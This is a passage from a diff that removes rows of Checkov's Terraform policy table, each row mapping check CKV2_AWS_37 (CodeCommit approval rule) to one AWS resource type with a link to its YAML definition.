-|  971 | CKV2_AWS_37              | resource                         | aws_cloudwatch_metric_alarm                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  972 | CKV2_AWS_37              | resource                         | aws_codebuild_project                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  973 | CKV2_AWS_37              | resource                         | aws_codebuild_source_credential                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  974 | CKV2_AWS_37              | resource                         | aws_codebuild_webhook                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  975 | CKV2_AWS_37              | resource                         | aws_codecommit_repository                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  976 | CKV2_AWS_37              | resource                         | aws_codecommit_trigger                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  977 | CKV2_AWS_37              | resource                         | aws_codedeploy_app                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  978 | CKV2_AWS_37              | resource                         | aws_codedeploy_deployment_config                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  979 | CKV2_AWS_37              | resource                         | aws_codedeploy_deployment_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  980 | CKV2_AWS_37              | resource                         | aws_codepipeline                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  981 | CKV2_AWS_37              | resource                         | aws_codepipeline_webhook                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  982 | CKV2_AWS_37              | resource                         | aws_codestarnotifications_notification_rule                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  983 | CKV2_AWS_37              | resource                         | aws_cognito_identity_pool                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  984 | CKV2_AWS_37              | resource                         | aws_cognito_identity_pool_roles_attachment                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  985 | CKV2_AWS_37              | resource                         | aws_cognito_identity_provider                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  986 | CKV2_AWS_37              | resource                         | aws_cognito_resource_server                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  987 | CKV2_AWS_37              | resource                         | aws_cognito_user_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  988 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  989 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool_client                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  990 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool_domain                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  991 | CKV2_AWS_37              | resource                         | aws_config_aggregate_authorization                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  992 | CKV2_AWS_37              | resource                         | aws_config_config_rule                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  993 | CKV2_AWS_37              | resource                         | aws_config_configuration_aggregator                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  994 | CKV2_AWS_37              | resource                         | aws_config_configuration_recorder                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  995 | CKV2_AWS_37              | resource                         | aws_config_configuration_recorder_status                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  996 | CKV2_AWS_37              | resource                         | aws_config_delivery_channel                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  997 | CKV2_AWS_37              | resource                         | aws_config_organization_custom_rule                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  998 | CKV2_AWS_37              | resource                         | aws_config_organization_managed_rule                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  999 | CKV2_AWS_37              | resource                         | aws_cur_report_definition                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1000 | CKV2_AWS_37              | resource                         | aws_customer_gateway                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1001 | CKV2_AWS_37              | resource                         | aws_datapipeline_pipeline                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1002 | CKV2_AWS_37              | resource                         | aws_datasync_agent                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1003 | CKV2_AWS_37              | resource                         | aws_datasync_location_efs                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1004 | CKV2_AWS_37              | resource                         | aws_datasync_location_nfs                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1005 | CKV2_AWS_37              | resource                         | aws_datasync_location_s3                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1006 | CKV2_AWS_37              | resource                         | aws_datasync_location_smb                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1007 | CKV2_AWS_37              | resource                         | aws_datasync_task                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1008 | CKV2_AWS_37              | resource                         | aws_dax_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1009 | CKV2_AWS_37              | resource                         | aws_dax_parameter_group                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1010 | CKV2_AWS_37              | resource                         | aws_dax_subnet_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1011 | CKV2_AWS_37              | resource                         | aws_db_cluster_snapshot                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1012 | CKV2_AWS_37              | resource                         | aws_db_event_subscription                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1013 | CKV2_AWS_37              | resource                         | aws_db_instance                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1014 | CKV2_AWS_37              | resource                         | aws_db_instance_role_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1015 | CKV2_AWS_37              | resource                         | aws_db_option_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1016 | CKV2_AWS_37              | resource                         | aws_db_parameter_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1017 | CKV2_AWS_37              | resource                         | aws_db_security_group                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1018 | CKV2_AWS_37              | resource                         | aws_db_snapshot                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1019 | CKV2_AWS_37              | resource                         | aws_db_subnet_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1020 | CKV2_AWS_37              | resource                         | aws_default_network_acl                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1021 | CKV2_AWS_37              | resource                         | aws_default_route_table                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1022 | CKV2_AWS_37              | resource                         | aws_default_security_group                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1023 | CKV2_AWS_37              | resource                         | aws_default_subnet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1024 | CKV2_AWS_37              | resource                         | aws_default_vpc                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1025 | CKV2_AWS_37              | resource                         | aws_default_vpc_dhcp_options                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1026 | CKV2_AWS_37              | resource                         | aws_devicefarm_project                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1027 | CKV2_AWS_37              | resource                         | aws_directory_service_conditional_forwarder                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1028 | CKV2_AWS_37              | resource                         | aws_directory_service_directory                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1029 | CKV2_AWS_37              | resource                         | aws_directory_service_log_subscription                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1030 | CKV2_AWS_37              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1031 | CKV2_AWS_37              | resource                         | aws_dms_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1032 | CKV2_AWS_37              | resource                         | aws_dms_endpoint                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1033 | CKV2_AWS_37              | resource                         | aws_dms_event_subscription                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1034 | CKV2_AWS_37              | resource                         | aws_dms_replication_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1035 | CKV2_AWS_37              | resource                         | aws_dms_replication_subnet_group                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1036 | CKV2_AWS_37              | resource                         | aws_dms_replication_task                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1037 | CKV2_AWS_37              | resource                         | aws_docdb_cluster                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1038 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_instance                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1039 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1040 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_snapshot                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1041 | CKV2_AWS_37              | resource                         | aws_docdb_subnet_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1042 | CKV2_AWS_37              | resource                         | aws_dx_bgp_peer                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1043 | CKV2_AWS_37              | resource                         | aws_dx_connection                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1044 | CKV2_AWS_37              | resource                         | aws_dx_connection_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1045 | CKV2_AWS_37              | resource                         | aws_dx_gateway                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1046 | CKV2_AWS_37              | resource                         | aws_dx_gateway_association                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1047 | CKV2_AWS_37              | resource                         | aws_dx_gateway_association_proposal                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1048 | CKV2_AWS_37              | resource                         | aws_dx_hosted_private_virtual_interface                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1049 | CKV2_AWS_37              | resource                         | aws_dx_hosted_private_virtual_interface_accepter                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1050 | CKV2_AWS_37              | resource                         | aws_dx_hosted_public_virtual_interface                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1051 | CKV2_AWS_37              | resource                         | aws_dx_hosted_public_virtual_interface_accepter                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1052 | CKV2_AWS_37              | resource                         | aws_dx_hosted_transit_virtual_interface                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1053 | CKV2_AWS_37              | resource                         | aws_dx_hosted_transit_virtual_interface_accepter                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1054 | CKV2_AWS_37              | resource                         | aws_dx_lag                                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1055 | CKV2_AWS_37              | resource                         | aws_dx_private_virtual_interface                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1056 | CKV2_AWS_37              | resource                         | aws_dx_public_virtual_interface                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1057 | CKV2_AWS_37              | resource                         | aws_dx_transit_virtual_interface                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1058 | CKV2_AWS_37              | resource                         | aws_dynamodb_global_table                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1059 | CKV2_AWS_37              | resource                         | aws_dynamodb_table                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1060 | CKV2_AWS_37              | resource                         | aws_dynamodb_table_item                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
